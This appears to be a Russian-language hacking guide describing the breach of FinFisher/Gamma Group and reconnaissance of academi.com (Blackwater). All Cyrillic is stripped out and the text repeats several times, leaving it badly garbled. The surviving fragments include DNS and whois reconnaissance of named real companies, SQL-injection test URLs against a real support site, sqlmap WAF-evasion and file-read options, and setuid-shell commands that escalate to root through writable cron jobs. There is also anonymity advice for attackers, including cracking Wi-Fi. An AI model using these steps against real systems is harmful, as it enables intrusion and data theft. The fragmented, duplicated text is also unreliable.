, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
